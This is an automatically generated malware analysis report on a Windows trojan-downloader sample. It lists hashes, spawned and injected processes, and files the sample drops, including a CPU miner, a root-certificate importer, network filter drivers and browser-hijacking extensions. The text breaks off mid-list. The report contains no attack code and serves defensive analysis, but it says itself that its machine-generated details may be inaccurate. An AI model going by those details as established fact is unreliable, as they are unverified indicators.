SearchProtectToolbar_pcap_a106c38e96

by malwarelabrobot on May 2nd, 2015 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a106c38e961227fe401fed3e357285bc
SHA1: 0f20114e27ce4a22b68bd6b326d6033183ccfa24
SHA256: 1c17b3de2308f87d3e9cbee15e9938a8d81377195f8f4fc6030b09e7a1352046
SSDeep: 1536:RQpQ5EP0ijnRTXJz54Gc9 BUM/wAcP0lscLD8F:RQIURTXJz54GW BUM/w9if6
Size: 71112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: g3CvT78vSMa0N0LPai7QvtmUwmghB
Created at: 2009-12-06 00:50:46
Analyzed on: Windows7Ada SP1 64-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

ProtectService.exe:3580
ProtectService.exe:3668
g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884
ProtectWindowsManager.exe:3736
ProtectWindowsManager.exe:3316
import_root_cert.exe:3188
15094FED_stp.EXE:3668
cpuminer-x11opt-setup.exe:3752
DesProtetor.exe:536
wpm_v20.0.0.2227.exe:3268
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948
QQBrowser.exe:3824
QQBrowser.exe:3212
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816
powershell.exe:3772
powershell.exe:3656
powershell.exe:3376
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_am2.exe:3564
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cp.exe:3480
XTab_Setup2253.exe:1748
cmdshell.exe:3596
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_a9.exe:3400
amisid.exe:3516
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe:4024
nfregdrv.exe:3588
nfregdrv.exe:3076
nfregdrv.exe:1648
nfregdrv.exe:3924
nfregdrv.exe:3192
HPNotify.exe:3640
CashReminder.exe:3984
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_cr.exe:1520
ActSys.exe:148
certutil.exe:3280
g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268
amisetup2899__9664.exe:3368
GOSafer.exe:3264
WNet.exe:4016
310714_is.exe:948

The Trojan injects its code into the following process(es):

DesProtetor.exe:4032
%original file name%.exe:1512
CashReminder.exe:1108
ActSys.exe:3756
GOSafer.exe:3284
WNet.exe:3080

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex

File activity

The process ProtectService.exe:3580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\msvcp110.dll (536 bytes)
%Program Files% (x86)\XTab\msvcr110.dll (876 bytes)

The process ProtectService.exe:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\XTab\CmdShell.exe (32 bytes)

The process g3CvT78vSMa0N0LPai7Qvt_mb_1.exe:1884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\mt-core[1].js (42633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\contabilizar[1].htm (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\error[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\icone_cadeado[1].gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\verificar_ip[1].htm (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\error[1] (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\i[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\top-line[1].gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\8Hk4o[1].htm (185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\SL2[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\783GTYVS\carregando[1].gif (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\s9[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\warning[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310113f8[1].htm (1006 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\010914i[1].htm (308 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BD.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F7QBP14P\MobiMidia_validation[1].js (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\150814c[1].htm (637 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROWYV75Q\carregando3[1].gif (1 bytes)

The process ProtectWindowsManager.exe:3736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\up[1].htm (1 bytes)
C:\ProgramData\WindowsMangerProtect\update\conf (1 bytes)

The process import_root_cert.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (90 bytes)

The process 15094FED_stp.EXE:3668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\uninst.exe (1305 bytes)
%Program Files% (x86)\DesProtetor\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsx2A2C.tmp (74611 bytes)
%Program Files% (x86)\DesProtetor\ssleay32.dll (12088 bytes)
%Program Files% (x86)\DesProtetor\nfapi.dll (4992 bytes)
%Program Files% (x86)\DesProtetor\desprotetordrv.sys (1856 bytes)
C:\Windows\System32\drivers\desprotetordrv.sys (51 bytes)
%Program Files% (x86)\DesProtetor\libeay32.dll (35507 bytes)
%Program Files% (x86)\DesProtetor\DesProtetor.exe (15982 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsh2AB9.tmp\SimpleSC.dll (1921 bytes)
%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (9320 bytes)

The process cpuminer-x11opt-setup.exe:3752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\CPUFeatures.dll (20 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\System.dll (23 bytes)
C:\Windows\System32\cpuminer-gw64.exe (41231 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\nsProcess.dll (12 bytes)
C:\Windows\System32\cpuminer-conf.json (420 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\cpuminer\cpuminer-uninst.exe (1279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nshEB58.tmp\UserInfo.dll (8 bytes)

The process DesProtetor.exe:536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\DesProtetor\ProtocolFilters.dll (249 bytes)

The process DesProtetor.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\rules[5].txt (111 bytes)
C:\Windows\Temp\P_RuleList.txt (111 bytes)

The process wpm_v20.0.0.2227.exe:3268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (2444 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_nj.exe:3948 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\ActSys\asfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SelfDel.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
%Program Files% (x86)\ActSys\ssleay32.dll (12088 bytes)
%Program Files% (x86)\ActSys\remove_ActSys.exe (313 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\System.dll (23 bytes)
C:\Windows\System32\drivers\asfilterdrv.sys (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\nsExec.dll (14 bytes)
%Program Files% (x86)\ActSys\ProtocolFilters.dll (38495 bytes)
%Program Files% (x86)\ActSys\ActSys.exe (15990 bytes)
%Program Files% (x86)\ActSys\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsxF307.tmp\SimpleSC.dll (1921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscF0B5.tmp (140252 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
%Program Files% (x86)\ActSys\nfregdrv.exe (1601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\NJaxIntermediate.cer (774 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\nss (4 bytes)
%Program Files% (x86)\ActSys\nfapi.dll (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ActSys\SSL\import_root_cert.exe (3406 bytes)

The process QQBrowser.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\RegWrite.exe (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.2227.exe (676 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ChromeSync.exe (286 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\XTab_Setup2253.exe (148 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\479.db (288 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WebDataJs (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\tmp\ClearnC.exe (114 bytes)

The process QQBrowser.exe:3212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\icon.png (628 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\index.html (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\prefs.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\aes.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code1.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\default_logo.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery.autocomplete.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\479.json (512 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\newtab.ico (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\xagainit.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\mostgrid.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code2.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\misc.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button1.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\settings.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\google_trends.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\common.js (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox_select.png (783 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\MessageBox.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code5.jpg (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en-US\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\js.js (660 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pl\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg1.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\simple.css (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CH\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bk_shadow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\preferences.js (379 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_bg.png (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\scrollbar.bmp (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\addonmanager.js (531 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code4.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-TW\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code3.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\button.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\install.rdf (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\code6.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\doT.min.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\hotSearch.js (6 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\min.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\googlelogo.png (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-LU\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-BE\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\B934D573F69tmp\QQBrowserFrame.dll (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\misc.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\uninstallDlg2.xml (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\stat.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\vi\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\tr\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checked.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\restoreprefs.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\checkbox.png (545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\en\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome.manifest (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\properties.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\pack\ga.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (486 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\logo.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\bg.png (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\about_blank_hook.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\lib\jquery-2.1.0.min.js (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\popup_image_helper.js (693 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\loading_light.png (139 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\pt-BR\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\unchecked.png (135 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\tools\urlrequestor.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\js\module\search.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\last_tab.js (4 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\style.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it\locale.properties (1 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\it-CH\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\UninstallManager.exe (14022 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\83B.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\code\Thumbs.db (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\include\speed_dial.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\es-419\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\skin\loading.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\content\quick_start.xul (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\close.png (3 bytes)
%Program Files% (x86)\Mozilla Firefox\browser\searchplugins\istartsurf.xml (553 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\ru-MO\locale.properties (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\istartsurf\images\Thumbs.db (27 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\modules\remoterequest.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\zh-CN\locale.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\81A.tmp (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\defaults\preferences\fvd.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\1430435238_xpi\chrome\locale\fr-CA\locale.properties (2 bytes)

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_br.exe:3816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files% (x86)\WNet\ssfilterdrv.sys (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SimpleSC.dll (1921 bytes)
C:\Windows\System32\drivers\ssfilterdrv.sys (51 bytes)
%Program Files% (x86)\WNet\uninst.exe (2792 bytes)
%Program Files% (x86)\WNet\nfregdrv.exe (1601 bytes)
%Program Files% (x86)\WNet\ProtocolFilters.dll (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsmEDE7.tmp (70570 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\SelfDel.dll (13 bytes)
%Program Files% (x86)\WNet\ssleay32.dll (12088 bytes)
%Program Files% (x86)\WNet\WNet.exe (15606 bytes)
%Program Files% (x86)\WNet\libeay32.dll (35507 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssEEA4.tmp\System.dll (23 bytes)
%Program Files% (x86)\WNet\nfapi.dll (4992 bytes)

The process %original file name%.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

